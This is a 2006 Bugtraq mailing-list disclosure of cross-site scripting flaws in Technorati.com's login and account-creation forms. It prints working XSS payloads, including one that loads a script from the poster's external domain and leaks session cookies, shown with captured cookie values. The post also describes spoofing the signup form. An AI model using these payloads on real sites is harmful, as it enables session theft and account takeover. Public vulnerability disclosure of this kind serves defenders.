Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Technorati.com - XSS with cookie disclosure

From: luny () youfucktard com
Date: 14 Jun 2006 08:52:30 -0000
Technorati.com

Homepage:
http://www.technorati.com

Affected files:

login box
Creating a new account input boxes


Login box XSS vuln:
By escaping quotes and using script tags, we can acomplish our XSS example. For PoC try putting the following code in 
the login box:

">">">">'>'>'>"><"">">"><SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<"<"<"<'<'

Screenshots:
http://www.youducktard.com/xsp/technorati1.jpg

Our cookie data:

This is remote text via xss.js located at youfucktard.com tvisitor=34.127.0.22.1150259450857579; 
TECHNORATI_MEMBER=4d5bd72bf6b2e71e5be9fa8dc3d99d7b

------------------------------------------------

Creatinga new profile input boxes:

We use the same method as above, and since the "Emailaddress" box allows more characters then the others (
<"">">'>'><IMG SRC=javascript:alert(&#x27XSS&#x27;)><"<"<'<'<"><"


Spoofing forms to create XSS:

Now, the forms to create a new account can also be spoofed, the only data that seemsto be checked are illegal 
characters in usernames and email addresses. Below are three screenshots of spoofing the create account form, the XSS 
example that results in it, and the technorati.com page loading normally after.

Screenshots:
http://www.youfucktard.com/xsp/technorati3.jpg
http://www.youfucktard.com/xsp/technorati4.jpg
http://www.youfucktard.com/xsp/technorati5.jpg

Technorati profile:
http://www.technorati.com/profile/bonerbee
Previous By Date Next
Previous By Thread Next

Current thread: